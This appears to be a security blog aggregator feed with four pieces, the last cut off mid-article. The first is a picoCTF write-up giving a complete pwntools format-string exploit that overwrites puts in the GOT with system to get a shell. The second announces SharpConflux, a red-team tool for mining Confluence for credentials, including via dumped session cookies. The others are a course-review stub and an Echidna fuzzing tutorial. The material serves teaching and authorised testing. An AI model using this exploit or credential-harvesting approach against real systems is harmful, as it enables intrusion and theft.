Normal view

There are new articles available, click to refresh the page.
Before yesterdayVulnerabily Research

Format String Exploitation: A Hands-On Exploration for Linux

23 May 2024 at 11:00
Format String Exploitation Featurerd Image

Summary

This blogpost covers a Capture The Flag challenge that was part of the 2024 picoCTF event that lasted until Tuesday 26/03/2024. With a team from NVISO, we decided to participate and tackle as many challenges as we could, resulting in a rewarding 130th place in the global scoreboard. I decided to try and focus on the binary exploitation challenges. While having followed Corelan’s Stack & Heap exploitation on Windows courses, Linux binary exploitation was fairly new to me, providing a nice challenge while trying to fill that knowledge gap.

The challenge covers a format string vulnerability. This is a type of vulnerability where submitted data of an input string is evaluated as an argument to an unsafe use of e.g., a printf() function by the application, resulting in the ability to read and/or write to memory. The format string 3 challenge provides 4 files:

These files are provided to analyze the vulnerability locally, but the goal is to craft an exploit to attack a remote target that runs the vulnerable binary.

The steps of the final exploit:

  1. Fetch the address of the setvbuf function in libc. This is actually provided by the vulnerable binary itself via a puts() function to simulate an information leak printed to stdout,
  2. Dynamically calculate the base address of the libc library,
  3. Overwrite the puts function address in the Global Offset Table (GOT) with the system function address using a format string vulnerability.

For step 2, it’s important to calculate the address dynamically (vs statically/hardcoded) since we can validate that the remote target loads modules at different addresses every time it’s being run. We can verify this by running the binary multiple times, which provides different memory addresses each time it is being run. This is due to the combination of Address Space Layout Randomization (ASLR) and the Position Independent Executable (PIE) compiler flag. The latter can be verified by using readelf on our binary since the binary is provided as part of the challenge.

Interesting resource to learn more about the difference between these mitigations: ASLR/PIE – Nightmare (guyinatuxedo.github.io)

Then, by spawning a shell, we can read and submit the flag file content to solve the challenge.

Vulnerability Details

Background on string formatting

The challenge involved a format string vulnerability, as suggested by its name and description. This vulnerability arises when user input is directly passed and used as arguments to functions such as the C library’s printf() and its variants:

int printf(const char *format, ...)
int fprintf(FILE *stream, const char *format, ...)
int sprintf(char *str, const char *format, ...)
int vprintf(const char *format, va_list arg)
int vsprintf(char *str, const char *format, va_list arg)
C

Even with input validation in place, passing input directly to one of these functions (think: printf(input)) should be avoided. It’s recommended to use placeholders and string formatting such as printf("%s", input) instead.

The impact of a format string vulnerability can be divided in a few categories:

  • Ability to read values on the stack
  • Arbitrary memory reads
  • Arbitrary memory writes

In the case where arbitrary memory writes are possible, an adversary may obtain full control over the execution flow of the program and potentially even remote code execution.

Background on Global Offset Table

Both the Procedure Linkage Table (PLT) & Global Offset Table (GOT) play a crucial role in the execution of programs, especially those compiled using shared libraries – almost any binary running on a modern system.

The GOT serves as a central repository for storing addresses of global variables and functions. In the current context of a CTF challenge featuring a format string vulnerability, understanding the GOT is crucial. Exploiting this vulnerability involves manipulating the addresses stored in the GOT to redirect program flow.

When an executable is programmed in C to call function and is compiled as an ELF executable, the function will be compiled as function@plt. When the program is executed, it will jump to the PLT entry of function and:

  • If there is a GOT entry for function, it jumps to the address stored there;
  • If there is no GOT entry, it will resolve the address and jump there.

An example of the first option, where there is a GOT entry for function, is depicted in the visual below:

During the exploitation process, our goal is to overwrite entries in the GOT with addresses of our choosing. By doing so, we can redirect the program’s execution to arbitrary locations, such as shellcode or other parts of memory under our control.

Reviewing the source code

We are provided with the following source code:

#include <stdio.h>

#define MAX_STRINGS 32

char *normal_string = "/bin/sh";

void setup() {
	setvbuf(stdin, NULL, _IONBF, 0);
	setvbuf(stdout, NULL, _IONBF, 0);
	setvbuf(stderr, NULL, _IONBF, 0);
}

void hello() {
	puts("Howdy gamers!");
	printf("Okay I'll be nice. Here's the address of setvbuf in libc: %p\n", &setvbuf);
}

int main() {
	char *all_strings[MAX_STRINGS] = {NULL};
	char buf[1024] = {'\0'};

	setup();
	hello();	

	fgets(buf, 1024, stdin);	
	printf(buf);

	puts(normal_string);

	return 0;
}
C

Since we have a compiled version provided from the challenge, we can proceed and make it executable. We then do a test run, which provides the following output:

# Making both the executable & linker executable
chmod u+x format-string-3 ld-linux-x86-64.so.2

# Executing the binary
./format-string-3

Howdy gamers!
Okay I'll be nice. Here's the address of setvbuf in libc: 0x7f7c778eb3f0

# This is our input, ending with <enter>
test

test
/bin/sh
Bash

We note a couple of things:

  • The binary provides us with the memory address of the setvbuf function in the libc library,
  • We have a way of providing a string as input which is read by the fgets function and printed back in an unsafe manner using printf,
  • The program finishes with a puts() function call that writes /bin/sh to stdout.

This is hinting towards a memory address overwrite of the puts() function to replace it with the system() function address. As a result, it will then execute system("/bin/sh") and spawn a shell.

Vulnerability #1: Memory Leak

If we take another look at the source code above, we notice the following line in the hello() function:

printf("Okay I'll be nice. Here's the address of setvbuf in libc: %p\n", &setvbuf);
C

Here, the creators of the challenge intentionally leak a memory address to make the challenge easier. If not, we would have to deal with finding an information leak ourselves to bypass Address Space Layout Randomization (ASLR), if enabled.

We can still treat this as an actual information leak that provides us a memory address during runtime. We will use this information to dynamically calculate the base address of the libc library based on the setvbuf function address in the exploitation section below.

Vulnerability #2: Format String Vulnerability

In the test run above we provided a simple test string as input to the program, which was printed back to stdout via the puts(buf) function call. In an excellent paper that can be found here, we learned that we can use format specifiers in C to:

  • Read arbitrary stack values, using format specifiers such as %x (hexadecimal) or %p (pointers),
  • Read from arbitrary memory addresses using a combination of %c to move the argument pointer and %s to print the contents of memory starting from an address we specify in our input string,
  • Write to arbitrary memory addresses by controlling the output counter using %mc, which will increase the output counter with m. Then, we can write the output counter value to memory using %n, again if we provide the memory address correctly as part of our input string.

Even though the source code already indicates that our input is unsafely processed and parsed as an argument for the printf() function, we can verify that we have a format string vulnerability here by providing %p as input, which should read a value as a pointer and print it back to us:

# Executing the binary
./format-string-3

Howdy gamers!
Okay I'll be nice. Here's the address of setvbuf in libc: 0x7f2818f423f0

# This is our input, ending with <enter>
%p

# This is the output of the printf(buf) function call
# This now prints back a value as a pointer
0x7f28190a0963
/bin/sh
Bash

The challenge preceding format string 3, called format string 2, actually provided very good practice to get to know format string specifiers and how you can abuse them to read from memory and write to memory. Highly recommended!

Exploitation

We are now armed with an information leak that provides us a memory address and a format string vulnerability. Let’s try and combine these two to get code execution on our remote system.

Calculating input string offset

Before we can really start, there is something we need to address: how do we know where our input string is located in memory once we have sent it to the program? And why does this even matter?

Let’s first have a look at the input AAAAAAAA%2$p. This provides 8 A characters, and then a format specifier to read the 2nd argument to the printf() function, which will, in this case, be a value from memory:

Howdy gamers!
Okay I'll be nice. Here's the address of setvbuf in libc: 0x7fa5ae99b3f0
AAAAAAAA%2$p
AAAAAAAA0xfbad208b
/bin/sh
Bash

Ideally (we’re explaining why later), we have a format specifier %n$p where n is an offset to point exactly at the start of our input string. You can do this manually (%p, %2$p, %3$p…) until %p points to your input string, but I did this using gdb:

# Open the program in gdb
gdb format-string-3

# Put a breakpoint at the puts function
b puts

# Run the program
r

# Continue the program since it will hit the breakpoint 
# on the first puts call in our program (Howdy Gamers !)
c

# Provide our input AAAAAAAA followed by <enter>
AAAAAAAA
Bash

The program should now hit the breakpoint on puts() again, after which we can look at the stack using context_stack 50 to print 50×8 bytes on the stack. You should be able to identify your input string on the 33rd line, which we can easily calculate by dividing the number of bytes by 8:

Calculating offset based on stack line position.

You could assume that 33 is the offset we need, but there’s a catch:

From https://lettieri.iet.unipi.it/hacking/format-strings.pdf:

On 64b systems, the first 5 %lx will print the contents of the rsi, rdx, rcx, r8, and r9, and any additional %lx will start printing successive 8-byte values on the stack.

This means we need to add 5 to our offset to compensate for the 5 registers, resulting in a final offset of 38, as can be seen in the following visual:

Offset calculation arbitrary read
Created using Excalidraw

The offset displayed on top of the visual indicates the relative offset from the start of the stack.

This offset now points exactly to the start of our input string:

Howdy gamers!
Okay I'll be nice. Here's the address of setvbuf in libc: 0x7ff5ed4873f0
AAAAAAAA%38$p
AAAAAAAA0x4141414141414141
/bin/sh
Bash

AAAAAAAA is converted to 0x4141414141414141 in hexadecimal since we are printing the input string as a pointer using %p.

Now the (probably) more critical question to understand the answer to: why does it matter that we know how to point to our input string in memory? Up until this point, we have only been reading our own string in memory. What will happen when we replace our %p format specifier to read, to the %n format specifier?

Howdy gamers!
Okay I'll be nice. Here's the address of setvbuf in libc: 0x7f4bfd3ff3f0
AAAAAAAA%38$n
zsh: segmentation fault  ./format-string-3
Bash

We get a segmentation fault. What is going on? Our input string now tries to write the value of the output counter to the memory address we were pointing to before with %p, which is… our input string itself.

This means we now have control over where we can write values since we control the input string. We can also modify what we are writing to memory as long as we can control the output counter. We also have control over this, as explained before:

Write to arbitrary memory addresses by controlling the output counter using %mc, which will increase the output counter with m.

By changing the format specifier, we now executed the following:

Offset calculation arbitrary write
Created using Excalidraw

To clearly grasp the concept: if we change our input string to BBBBBBBB, we will now write to 0x4242424242424242 instead, indicating we can control to which memory address we are writing something by modifying our input string.

In this case, we received a segmentation fault since the memory at 0x4141414141414141 is not writeable (page protections, not mapped…). In the next part, we’re going to convert our arbitrary write primitive to effectively do something useful by overwriting an entry in the Global Offset Table.

Local Exploitation

Let’s take a step back and think what we logically need to do. We need to:

  1. Fetch the address of our setvbuf function in the libc library, provided by the program,
  2. From this address, calculate the base address of libc,
  3. Send a format string payload that overwrites the puts function address in the GOT with the system function address in libc,
  4. Continue execution to give control to the operator.

We are going to use the popular pwntools library for Python 3 to help us out quite a bit.

First, let’s attach to our program and print the lines until we hit the libc: output string, then store the memory address in an integer:

from pwn import *

p = process("./format-string-3")

info(p.recvline())              # Fetch Howdy Gamers!
info(p.recvuntil("libc: "))     # Fetch line right before setvbuffer address

# Get setvbuffer address
bytes_setvbuf_address = p.recvline()

# Convert output bytes to integer to store and work with our address
setvbuf_leak = int(bytes_setvbuf_address.split(b"x")[1].strip(),16)
info("Received setvbuf address leak: %s", hex(setvbuf_leak))
Python

### Sample Output
[+] Starting local process './format-string-3': pid 216507
[*] Howdy gamers!
[*] Okay I'll be nice. Here's the address of setvbuf in libc: 
[*] Received setvbuf address leak: 0x7fb19acc83f0
[*] Stopped process './format-string-3' (pid 216507)
Bash

Second, we manually load libc to be able to set its base address to match our (now local, but future remote) target libc base address. We do this by subtracting the setvbuf function address from our manually loaded libc from our leaked function address:

...
libc = ELF("./libc.so.6")
info("Calculating libc base address...")
libc.address = setvbuf_leak - libc.symbols['setvbuf']
info("libc base address: %s", hex(libc.address))
Python

### Sample Output
[+] Starting local process './format-string-3': pid 219013
[*] Howdy gamers!
[*] Okay I'll be nice. Here's the address of setvbuf in libc: 
[*] Received setvbuf address leak: 0x7f25a21de3f0
[*] Calculating libc base address...
[*] libc base address: 0x7f25a2164000
[*] Stopped process './format-string-3' (pid 219013)
Bash

Finally, we can utilize the fmstr_payload function of pwntools to easily write:

  • What: the system function address in libc
  • Where: the puts entry in the GOT of our binary

Before actually executing and sending our payload, let’s make sure we understand what’s happening. We start by noting down the addresses of:

  • the system function address in libc (0x7f852ddca760)
  • the puts entry in the GOT of our binary (0x404018)

next to the payload we are going to send in an interactive Python prompt, for demonstration purposes:

>>> elf = context.binary = ELF('./format-string-3')
>>> hex(libc.symbols['system'])
'0x7f852ddca760'
>>> hex(elf.got['puts'])
'0x404018'
>>> fmtstr_payload(38, {elf.got['puts'] : libc.symbols['system']})
b'%96c%47$lln%31c%48$hhn%6c%49$hhn%34c%50$hhn%53c%51$hhn%81c%52$hhnaaaabaa\x18@@\x00\x00\x00\x00\x00\x1d@@\x00\x00\x00\x00\x00\x1c@@\x00\x00\x00\x00\x00\x19@@\x00\x00\x00\x00\x00\x1a@@\x00\x00\x00\x00\x00\x1b@@\x00\x00\x00\x00\x00'
Python

You can divide the payload in different blocks, each serving the purpose we expected, although it’s quite a step up from what we’ve manually done before. We can identify the pattern %mc%n$hhn (or ending lln), which:

  • Increases the output counter with m (note that the output counter does not necessarily start at 0)
  • Writes the value of the output counter to the address selected by %n$hhn. The first n selects the relevant entry on the stack where our input string memory address is located. The second part, $hhn, resembles our expected %n format specifier, but the double hh is a modifier to truncate the output counter value to the size of a char, thus allowing us to write 1 byte.
Offset calculation precision write
Created using Excalidraw

Let’s now analyze the payload and calculate ourselves for 1 write operation to understand how the payload works. We have %96c%47$lln as the first block of our payload, which can be logically seen as a write operation. This:

  • Increases the output counter with 96h (hex) or 150d (decimal)
  • Writes the current value of the output counter (n, truncated by a long long (ll), or 8 bytes, to the memory address specified at offset 42:

As you can see in the payload above, offset 42 will correspond with \x18@@\x00\x00\x00\x00\x00, which is further down our payload. @ is \x40 in hex, so our target address matches the value for the puts entry in the GOT if we swap the endianness: \x00\x00\x00\x00\x00\x40\x40\x18, or 0x404018. This clearly indicates we are writing to the correct memory location, as expected.

You’ll notice that aaaabaa is also part of our payload: this serves as padding to correctly align our payload to have 8-byte addresses on the stack. The start of an offset on the stack should contain exactly the start of our 8-byte memory address to write to, since we’re working on a 64-bit system. If no padding is present, a reference to an offset would start in the middle of a memory address.

After writing, the payload will continue with processing the next block %31c%48$hhn, which again increases the output counter and writes to the next offset (43). This offset contains our next address. The payload will continue until 6 blocks are executed, which corresponds to 6 %…%n statements.

Now that we understand the payload, we load the binary using ELF and send our payload to our target process, after which we give interactive control to the operator:

...
elf = context.binary = ELF('./format-string-3')
info("Creating format string payload...")
payload = fmtstr_payload(38, {elf.got['puts'] : libc.symbols['system']})

# Ready to send payload!
info("Sending payload...")
p.sendline(payload)
p.clean()

# Give control to the shell to the operator
info("Payload successfully sent, enjoy the shell!")
p.interactive()
Python

The fmtstr_payload function really does a lot of heavy lifting for us combined with the elf and libc references. It effectively writes the complete address of libc.symbols[‘system’] to the location where elf.got[‘puts’] originally was in memory by precisely modifying the output counter and executing memory write operations.

### Sample Output
[+] Starting local process './format-string-3': pid 227263
[*] Howdy gamers!
[*] Okay I'll be nice. Here's the address of setvbuf in libc: 
[*] Received setvbuf address leak: 0x7fa7c29473f0
[*] '/home/kali/picoctf/libc.so.6'
[*] Calculating libc base address...
[*] libc base address: 0x7fa7c28cd000
[*] '/home/kali/picoctf/format-string-3'
[*] Creating format string payload...
[*] Sending payload...
[*] Payload successfully sent, enjoy the shell!
[*] Switching to interactive mode
$ whoami
kali
Bash

We successfully exploited the format string vulnerability and called system('/bin/sh'), resulting in an interactive shell!

Remote Exploitation

Switching to remote exploitation is trivial in this challenge, since we can simply reuse the local files to do our calculations. Instead of attaching to a local process using p = process("./format-string-3"), we substitute this by connecting to a remote target:

# Define remote targets
target_host = "rhea.picoctf.net"
target_port = 62200

# Connect to remote process
p = remote(target_host, target_port)
Python

Note that you’ll need to substitute the port that is provided to you after launching the instance on the picoCTF platform.

### Sample Output
...
[*] Payload successfully sent, enjoy the shell!
[*] Switching to interactive mode
$ ls flag.txt
flag.txt
Python

That concludes the exploit, after which we can submit our flag. In a real world scenario, getting this kind of remote code execution would clearly be a great risk.

Conclusion

The preceding challenges that lead up to this challenge (format string 0, 1, 2) proved to be a great help in understanding format string vulnerabilities and how to exploit them. Since Linux exploitation is a new topic to me, this was a great way to practice these types of vulnerabilities during a fun event.

Format string vulnerabilities are less common than they used to be, however, our IoT colleagues assured me they encountered some recently during an IoT device assessment.

That’s why it’s important to adhere to:

  • Input Validation
  • Limit User-Controlled Input
  • Enable (or pay attention to already enabled) compiler warnings for format string vulnerabilities
  • Secure Coding Practices

This should greatly limit the risk of format string vulnerabilities still being present in current day applications.

References

About the author

Wiebe Willems picture.

Wiebe Willems

Wiebe Willems is a Cyber Security Researcher active in the Research & Development team at NVISO. With his extensive background in Red & Purple Teaming, he is now driving the innovation efforts of NVISO’s Red Team forward to deliver even better advisory to its clients.

Wiebe honed his skills by getting certifications for well-known Red Teaming trainings, next to taking deeply technical courses about stack & heap exploitation.

Introducing SharpConflux

27 March 2024 at 09:00

Today, we are releasing a new tool called SharpConflux, a .NET application built to facilitate Confluence exploration. It allows Red Team operators to easily investigate Confluence instances with the goal of finding credential material and documentation relating to objectives without having to rely on SOCKS proxying.

SharpConflux is available for download from the GitHub repository below:

github GitHub: https://github.com/nettitude/SharpConflux/

Background

Red Team operators typically interact with the target organisation’s network via an in-memory implant supported by a Command and Control (C2) framework such as Fortra’s Cobalt Strike, MDSec’s Nighthawk or Nettitude’s PoshC2. Direct access to the corporate network through a Virtual Private Network (VPN) or graphical access to a Virtual Desktop Infrastructure (VDI) host is unusual, meaning that in order to interact with internal corporate websites, operators must tunnel traffic from their systems to the internal network, through the in-memory implant.

Multiple tooling exists for this purpose such as SharpSocks and Cobalt Strike’s built-in socks command. However, this approach presents two problems:

  • First of all, it is troublesome to setup. While a seasoned operator will be able to do so in minutes, I have yet to know a Red Teamer that enjoys the setup process and the laggy browsing experience. In fact, this tool was created as a result of a recent Red Team exercise during which, none of the operators wanted to have to setup proxying to explore an internal Confluence instance.
  • Secondly, in order to provide a stable and usable experience, it forces operators to set the implant’s beaconing time to a small value (almost always less than 100 milliseconds, and often 0 milliseconds). This significantly increases the number of HTTP requests transmitted over the existing C2 channel, creating abnormal volumes of traffic and therefore, providing detection opportunities. Additionally, this prevents certain in-memory evasion techniques from functioning as expected (e.g. Cobalt Strike’s sleep masks), thus potentially leading to a detection by the Endpoint Detection & Response (EDR) solution in place.

SharpConflux aims to bring Confluence exploration functionality to .NET, in a way that can be reliably and flexibly used through common C2 frameworks.

Confluence Introduction

Confluence is a data sharing platform developed by Atlassian, generally used by organisations as a corporate wiki.

Content is organised in spaces, which are intended to facilitate information sharing between teams (e.g. the IT department) or employees responsible for specific projects. Furthermore, users can setup their own personal spaces, to which they can upload public or private data.

Within these spaces, users can publish and edit web pages and blog posts through a web-based editor, and attach any relevant files to them. Additionally, users can add comments to pages and blog posts.

The diagram below, which has been extracted from Confluence’s support page, better illustrates the structure used by the platform:

The hierarchy of content in Confluence

From a Red Teamer’s perspective, Confluence is particularly useful in two scenarios:

  • During early stages of the operation, as all sorts of credentials can typically be found in Confluence. These may facilitate privilege escalation and lateral movement activities.
  • To discover documentation, hostnames and even credential material relating to the objective systems, which are usually targeted after achieving high levels of privileges and therefore, in late stages of the cyber kill chain.

Confluence Instance Types and Authentication

Atlassian offers three Confluence hosting options to fit different organisation’s requirements:

  • Confluence Cloud instances are maintained by Atlassian and hosted on their own AWS tenants. This is the preferred option for newer Atlassian clients. Confluence Cloud instances are accessed as a subdomain of atlassian.net. For instance, https://companysubdomain.atlassian.net/wiki/.
  • Confluence Server and Confluence Data Center instances are maintained by the relevant organisation and therefore, they are hosted on their servers. This can be completely on-premise, or in any cloud tenant managed by the organisation (e.g. Azure, AWS, GCP). Both instance types are similar but Data Center includes additional features. It should be noted that Atlassian has decided to discontinue Confluence Server and support ended in February 2024. However, it still has plans to support Confluence Data Center for the foreseeable future. These instance types run on TCP port 8090 by default and can typically be accessed through an internal FQDN (e.g. http://myconfluence.internal.local:8090). For the purpose of this tool, Confluence Server and Confluence Data Center are considered equivalent.

Even though a lot of organisations are migrating to Confluence Cloud, a significant proportion of them still use on-premise Confluence instances. In fact, it is not uncommon to find companies that have already made the move to Cloud but still maintain on-premise instances for specific internal projects, platforms or departments.

Certain attributes and API endpoints differ slightly between Cloud and Server / Data Center instances. More importantly, authentication methods are significantly different. SharpConflux has been developed with compatibility in mind, supporting a variety of authentication methods across the different instance types.

The most relevant authentication methods are described below.

Confluence Cloud: Email address + password authentication

Users can authenticate to Confluence Cloud instances using an email address and password combination. Upon browsing https://companysubdomain.atlassian.net/wiki/, unauthenticated users are redirected to https://id.atlassian.com/login, where the following form data is posted:

{
   "username":"EMAILVALUE",
   "password":"PASSWORDVALUE",
   "state":
   {
      "csrfToken":"CSRFTOKENVALUE",
      "anonymousId":"ANONYMOUSIDVALUE"
   },
   "token":"TOKENVALUE"
}

If the provided credentials within the username and password parameters, in addition to the csrfToken and token parameters are correct, the server will return a redirect URI. Subsequently accessing this URI will cause the server to set the cloud.session.token session cookie.

This authentication method is not supported by SharpConflux. From an adversarial perspective, firms very rarely rely on this authentication mechanism, as most will be using SAML SSO authentication for Cloud instances.

Confluence Cloud: Email address + API token

Users can create and manage their own API tokens by visiting https://id.atlassian.com/manage-profile/security/api-tokens:

In order to authenticate, the user’s email address and API token are submitted through the Authentication: Basic header in each HTTP request.

This authentication method is supported by SharpConflux. However, gathering valid API tokens is a rare occurrence.

Confluence Cloud: Third Party and SAML SSO

Confluence Cloud allows users to log in with third party (e.g. Apple, Google, Microsoft, Slack) accounts. Typically, firms will configure Confluence Cloud instances to authenticate through Active Directory Federation Services (ADFS) or Azure AD.

Once the SAML exchange is completed, the server will return a redirect URI to https://id.atlassian.com/login/authorize. Subsequently accessing this URI will cause the server to set the cloud.session.token session cookie.

As of the time of release, this authentication method is not supported by SharpConflux. Whilst this is the most commonly deployed authentication method by organisations relying on Confluence Cloud, it is also frequent for them to enforce Multi-Factor Authentication (MFA), making cookie-based authentication a much more interesting method from an adversarial perspective.

Confluence Cloud: Cookie-based Authentication

If you have managed to dump Confluence Cloud cookies (e.g. via DPAPI), you can use SharpConflux to authenticate to the target instance. Please note that including a single valid cloud.session.token or tenant.session.token cookie should be sufficient to authenticate, but you can specify any number of cookies if you prefer.

Confluence Server / Data Center: Username + password (Basic authentication)

By default, Confluence Server / Data Center installations support username + password authentication through the Authorization: Basic HTTP request header. However, Basic authentication can be disabled by the target organisation through the “Allow basic authentication on API calls” setting:

This authentication method is supported by SharpConflux. From an adversarial perspective, finding a username and password combination for an on-premise Confluence instance is one of the most common scenarios.

Confluence Server / Data Center: Username + password (via form data)

Users can visit the on-premise Confluence website (e.g. http://myconfluence.internal.local:8090) and log in using a valid username and password combination. The following HTTP POST request will be sent as a result:

POST /dologin.action HTTP/1.1
[...]

os_username=USERNAMEVALUE&os_password=PASSWORDVALUE&login=Log+in&os_destination=%2Findex.action

If the provided credentials within the os_username and os_password parameters are correct, the server will set the JSESSIONID session cookie.

This authentication method is supported by SharpConflux. Similarly to the previous method, finding a username and password combination is one of the most common scenarios. Please note that this authentication method will still work even if the “Allow basic authentication on API calls” setting is disabled.

Confluence Server / Data Center: Personal Access Token (PAT)

On Confluence Server / Data Center installations, users are allowed to create and manage their own Personal Access Tokens (PATs), which will match their current permission level. PATs can be created from /plugins/personalaccesstokens/usertokens.action:

In order to authenticate, the PAT is submitted through the Authentication: Bearer header in each HTTP request.

While this authentication method is supported by SharpConflux, it has only been added for completeness and to support edge cases, as I have never come across a PAT.

Confluence Server / Data Center: SSO

Similarly to Confluence Cloud instances, Confluence Server / Data Center variations support authentication through various Identity Providers (IdP) including ADFS, Azure AD, Bitium, Okta, OneLogin and PingIdentity. However, in this case, it is uncommon to find on-premise Confluence instances making use of SSO. For this reason, this authentication method is not supported by SharpConflux as of the time of release.

Confluence Server / Data Center: Cookie-based authentication

If you have managed to dump Confluence Server / Data Center cookies (e.g. via DPAPI), you can use SharpConflux to authenticate to the target instance. Please note that including a single valid JSESSIONID or seraph.confluence cookie should be sufficient to authenticate, but you can specify any number of cookies if you prefer.

Summary

Confluence is the most widely used corporate wiki platform, often storing sensitive data that can largely facilitate privilege escalation and lateral movement activities. Whilst this blog post has not uncovered any new attack techniques, release of SharpConflux aims to help Red Team operators by providing an easy way to interact with all types of Confluence instances.

SharpConflux has been tested against the latest supported versions as of the time of development (Cloud 8.3.2, Data Center 7.19.10 LTS and Data Center 8.3.2). A complete list of features, usage guidelines and examples can be found in the referenced GitHub project.

github GitHub: https://github.com/nettitude/SharpConflux/

 

The post Introducing SharpConflux appeared first on LRQA Nettitude Labs.

OffSec EXP-401 Advanced Windows Exploitation (AWE) – Course Review

By: voidsec
18 January 2024 at 16:19

In November of last year, I took the OffSec EXP-401 Advanced Windows Exploitation class (AWE) at Black Hat MEA. While most of the blog posts out of there focus on providing an OSEE exam review, this blog post aims to be a day-by-day review of the AWE course content. OffSec Exp-401 (AWE) During the first […]

The post OffSec EXP-401 Advanced Windows Exploitation (AWE) – Course Review appeared first on VoidSec.

The Art of Fuzzing – Smart Contracts

By: shogun
27 July 2023 at 00:38

Author: 2ourc3

Introduction to Smart Contract Auditing with Fuzzing

In this article we are gonna approach auditing smart contracts to detect vulnerabilities through fuzzing. This article assumes that the reader has a decent understanding of Solidity and Smart Contracts or is willing to use google along.

The field is very young, which means there are plenty of fun and exciting vulnerabilities to find. There is the interesting money aspect because smart contracts bug bounties are very lucrative since they have the potential to cause significant financial losses.

Also, the technology in itself is amazing. Smart contracts use a variety of techniques that are interesting to learn about such as Cryptography, distributed computing, state-machine, etc.

There are various methods to search for vulnerabilities in smart contracts – Manual code review, automated code review, fuzzing, symbolic execution, etc.

I have a strong interest in manual code review and dynamic analysis through fuzzing or symbolic execution. I decided to create this article to teach you how to fuzz a Smart Contract for the Ethereum blockchain using Echidna

What is Echidna

Echidna is a weird creature that eats bugs and is highly electro-sensitive

Echidna is a fuzzer designed to test Ethereum smart contracts. What sets Echidna apart from other fuzzers is the fact that it focuses on breaking user-defined proprieties instead of looking for crashes. It uses sophisticated grammar-based fuzzing based on contract ABI to falsify user-defined predicates or Solidity Assertions.

The core Echidna functionality is an executable called Echidna, which takes a contract and a list of invariants (properties that should always remain true) as input. For each invariant, it generates random sequences of calls to the contract and checks if the invariant holds. If it can find some way to falsify the invariant, it prints the call sequence that does so.

Installing Echidna

The installation process is pretty straight-forward

// Installating Slither
pip3 install slither-analyzer --user

// Installing Solc
sudo add-apt-repository ppa:ethereum/ethereum
sudo apt-get update
sudo apt-get install solc

Then download one of the latest release of Echidna, extract the archive and profit.

Echidna Testing modes

Property Mode

Echidna properties are Solidity functions. A property must: Have no arguments. Return true if successful. Have its name starting with echidna.

Echidna will: Automatically generate arbitrary transactions to test the property. Report any transactions that lead a property to return false or throw an error. Discard side-effects when calling a property (i.e., if the property changes a state variable, it is discarded after the test).

Echidna requires a constructor without input arguments. If your contract needs specific initialization, you should do it in the constructor. The following function demonstrates how to test a smart contract with writing a property. The smart contract we are going to use the contract Token.sol.

// Use inheritance to separate your contract from your properties:
contract TestToken is Token {
    function echidna_balance_under_1000() public view returns (bool) {
        return balances[msg.sender] <= 1000;
    }
}

You can run Echidna to test that condition using the following command: echidna testtoken.sol --contract TestToken

Echidna found that the property is violated if the backdoor function is called. More details in the docs.

Assertions

Assertions mode allows you to verify that a certain condition is obtained after executing a function. You can insert an assertion using either assert(condition) or by using a special event called AssertionFailed like this event AssertionFailed(uint256); .... if(condition){ emit AssertionFailed(value); }

More details in the docs. You can also read an excellent blog post about assertions here.

dApptest

Using the “dapptest” testing mode, Echidna will report violations using certain functions following how dApptool and foundry work:

  • This mode uses any function name with one or more arguments, which will trigger a failure if they revert, except in one special case. Specifically, if the execution reverts with the special reason “FOUNDRY::ASSUME”, then the test will pass (this emulates how the assume foundry cheat code works)

Foundry is a smart contract development toolchain. You can learn more about it here: https://book.getfoundry.sh/. More information about choosing the right test method of Echidna can be found in the docs.

You should now have a good understanding of the basics usage of Echidna. However i strongly encourage you to check the documentation available since there is a lot of optimization and advanced techniques you can benefit from.

Echidna host a series of tutorials and docs here.

Finding a target to fuzz

A good approach to find a target to fuzz is by searching for an interesting program on Immunefi. Keep in mind that while fuzzing is an automated process, you might still need to invest time in understanding the code and the project you wish to fuzz. Therefore, take the time to find a target that genuinely interests you and makes you feel comfortable spending time understanding the contract’s mechanics.

After searching on Immunefi and applying some filters, I have obtained a list of several potential targets.

I decided to focus on the Optimism project because I had already invested time in understanding it in the past. However, feel free to explore the possibilities based on your interests.

All smart contracts related to the Optimism project can be found on their Github, and the list of all deployed smart contracts in scope is available on the Bug Bounty page.

To successfully fuzz a target, one must comprehend how it functions, establish at least a basic threat model, and decide how to test its security. Before commencing the audit of a target, I always follow the following process

  • Information Gathering: Begin by exploring the project’s website, including the parent project if applicable, to familiarize yourself with the concept and gain a clear understanding of its purpose. Since good documentation is often scarce, take the time to thoroughly read any available documentation to leverage the valuable insights provided by the developers.
  • Code Review: There are various techniques for conducting an efficient code review. You can choose to follow the instruction flow, read it line by line, or use suitable tools that match your preferences. In this context, the primary focus of the code review is to identify fuzzable functions, rather than manually searching for vulnerabilities. I have opted to follow the instruction flow to gain a comprehensive understanding of the overall project.
  • Threat Modeling: Once you start reading the code and have a clear grasp of its functionality, document potential dangerous functions or sensitive data that you come across. Effective threat modeling helps you concentrate on relevant aspects during the code review process.

Information gathering

Optimism is described as follow on the official website – OP Mainnet is a fast, stable, and scalable L2 blockchain built by Ethereum developers, for Ethereum developers. Built as a minimal extension to existing Ethereum software, OP Mainnet’s EVM-equivalent architecture scales your Ethereum apps without surprises. If it works on Ethereum, it works on OP Mainnet at a fraction of the cost.

In other terms, it’s an equivalent network to Ethereum that you can use to spend less fees on gas while executing Ethereum-compatible contracts. It acts as a Layer 2, which means that it relies on a Layer 1 blockchain – Ethereum

Optimism roll-up is a blockchain that piggybacks off of the security of another “parent” blockchain. Specifically, Optimistic Rollups take advantage of the consensus mechanism (like PoW or PoS) of their parent chain instead of providing their own. In OP Mainnet’s case, this parent blockchain is Ethereum. The process is described on the following page https://community.optimism.io/docs/protocol/2-rollup-protocol/

More information about the fault-proof process are discussed here. Here is the list of the contract involved in the Optimism roll-up process:

Other contracts and part of the Optimism project are in-scope, since the goal is to keep this article short (already failed) we ain’t gonna audit the code-base but focus more on the part related to the roll-up process.

Code-Review

We gain a pretty good overview of what the project does, we listed all the contracts. It’s now time to dive into the code. Remember here the goal isn’t to manually review everything but more to find what to fuzz and how to do it.

For the source code available on Github the process is pretty straightforward, simply click on the link and read it. However, deployed smart contracts are actual byte-code encoded. Etherscan offers a contract tab where you can see the decompiled Solidity contract as follow

Now we can start a more laborious step: analyze all the code snippets from all the contracts to find what to fuzz. An easy way to download all the contracts and dependencies at one address using Etherscan is to click on “Open In” then open it in Remix IDE. You can then download the entire project as a zip file.

You can also open the smart contract with “Open In” Blockscan IDE, which embed a Visual Code IDE in your web browser. Here we see how the contract is organized on the left and the actual code on the right


